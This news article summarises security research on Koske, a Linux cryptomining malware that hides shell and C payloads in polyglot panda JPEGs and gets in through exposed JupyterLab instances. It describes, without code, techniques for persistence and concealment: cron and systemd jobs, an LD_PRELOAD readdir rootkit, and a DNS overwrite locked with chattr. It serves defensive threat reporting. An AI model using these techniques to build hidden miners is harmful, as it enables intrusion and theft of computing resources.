A new Linux malware variant, known as Koske, has emerged, reportedly leveraging artificial intelligence in its design. This sophisticated threat employs seemingly innocuous JPEG images of panda bears as a means to inject malware directly into system memory.
Analysis of Koske
Research from AquaSec, a cybersecurity firm, has characterized Koske as a highly advanced Linux threat. The malware’s adaptive behaviors suggest it may have been developed utilizing large language models (LLMs) or modern automation frameworks, reflecting a significant evolution in cyber attack sophistication.
Koske primarily targets computational resources to deploy CPU and GPU-optimized cryptocurrency miners, allowing it to mine over 18 different cryptocurrencies. The ongoing attacks have been traced to IP addresses in Serbia, with evidence of localized language use in both scripts and repositories, although definitive attribution remains elusive.
Mechanism of Infection
Initial access to the target system is achieved by exploiting misconfigurations in JupyterLab instances that are publicly exposed, facilitating command execution. Once the attacker gains entry, they download two JPEG files of panda bears from reputable hosting services such as OVH, Freeimage, and Postimage, which contain concealed malicious payloads.
AquaSec emphasizes that the threat actor employs polyglot files, rather than traditional steganography, allowing a single file to function simultaneously as an image and a script depending on the software accessing it. Each file presents a valid JPEG header while appending malicious shell scripts and C code, enabling dual interpretation.
When a user opens these files, they view a cute panda image, but concurrently, a script interpreter executes the appended shell code.
Attack Execution
The attacks identified by AquaSec involve the execution of two distinct payloads embedded in each image, deployed in parallel:
- C Code Payload: This component is executed directly in memory and compiled as a shared object file (.so), functioning as a rootkit.
- Shell Script Payload: This shell script also executes in memory, employing standard Linux utilities to maintain stealth and persistence while minimizing its visibility.
The shell script operates using native Linux commands, establishing a persistent presence via cron jobs that execute every 30 minutes and custom systemd services. Additionally, it implements network hardening techniques and employs proxy evasion tactics, such as overwriting /etc/resolv.conf to use Cloudflare and Google DNS, which it secures with the chattr +i command.
Advanced Capabilities
The adaptable nature of Koske, as evidenced by its capabilities to manipulate system utilities, suggests the malware was developed with a focus on automation and stealth. The C-based rootkit utilizes LD_PRELOAD to override the readdir() function, effectively concealing malware-related processes and directories from user-space monitoring solutions. It filters entries based on specific keywords and utilizes hidden PID management strategies.
Following the establishment of network access and persistence, the shell script retrieves cryptocurrency miners from GitHub, leveraging additional computational resources for optimized performance.
Cryptocurrency Mining Operations
Koske supports the mining of a diverse range of cryptocurrencies, including privacy-focused coins like Monero, Ravencoin, Zano, Nexa, and Tari. Its programmatic design allows it to evaluate the host system’s CPU and GPU capabilities to determine the most efficient mining payload. Moreover, if a particular coin or mining pool becomes unavailable, Koske can alternate to backup options from its internal list, showcasing a notable degree of automation.
Future Threat Landscape
AquaSec has raised alarms regarding the implications of AI-driven malware like Koske, emphasizing that future iterations may exhibit even greater adaptability and sophistication. As the landscape of cybersecurity continues to evolve, organizations must remain vigilant and proactive in their defenses against such advanced threats.